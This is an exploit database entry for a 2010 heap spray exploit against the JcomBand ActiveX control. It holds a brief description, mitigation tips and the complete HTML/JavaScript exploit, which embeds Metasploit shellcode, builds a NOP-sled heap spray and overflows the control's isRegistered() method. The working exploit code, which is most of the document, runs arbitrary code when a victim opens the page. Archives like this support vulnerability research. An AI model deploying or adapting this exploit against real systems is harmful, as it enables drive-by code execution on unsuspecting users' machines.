JcomBand Exploit (heap spray)

vendor:

N/A

by:

germaya_x & D3V!L FUCKER

7,5

CVSS

HIGH

Heap Spray

119

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

JcomBand Exploit (heap spray)

This exploit is a heap spray attack which uses a malicious JavaScript code to inject a shellcode into the memory of the vulnerable system. The malicious code is embedded in an HTML page and when the page is opened, the code is executed and the shellcode is injected into the memory. The shellcode is then used to execute arbitrary code on the vulnerable system.

Mitigation:

Disable JavaScript in the browser, use a web application firewall, and apply the latest security patches.

Source

Exploit-DB raw data:

<html>
 <head>
  <title>JcomBand Exploit (heap spray) </title>
<object classid='clsid:952E3F80-0C34-48CD-829B-A45913B29670' id='test'></object>
<script language='javascript'>
    // Author:    [germaya_x & D3V!L FUCKER]
    // Version:   [2.5]
    // special thanx: [for my best friend his0k4].
    // Geetz [2] :[Sarbot511 ,thrid-devil].

    //calc from metasploit
     shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

     nops=unescape('%u9090%u9090');
     headersize =20;
     slackspace= headersize + shellcode.length;
     
     //Filling the header of our block with nops
    while(nops.length< slackspace) nops+= nops;
   
     fillblock= nops.substring(0, slackspace);
     
     block= nops.substring(0, nops.length- slackspace);
     
    while( block.length+ slackspace<0x40000) block= block+ block+ fillblock;
   
    //Creating new memory array.
     memory=new Array();
     
     //Filling the memory array with the nops + shellcode.
    for( counter=0; counter<300; counter++) memory[counter]= block + shellcode;
   
    // the ret is the adress of our shellcode in the heap.
     ret='%0a%0a%0a%0a';
     
     // filling our buffer with ret adress
    for( counter=0; counter<=50; counter++) ret+=unescape('%0a%0a%0a%0a');
   
    // passing the buffer argument to the vulnerable function JumpMappedID().
    test.isRegistered(ret);
</script>
</head>
</html>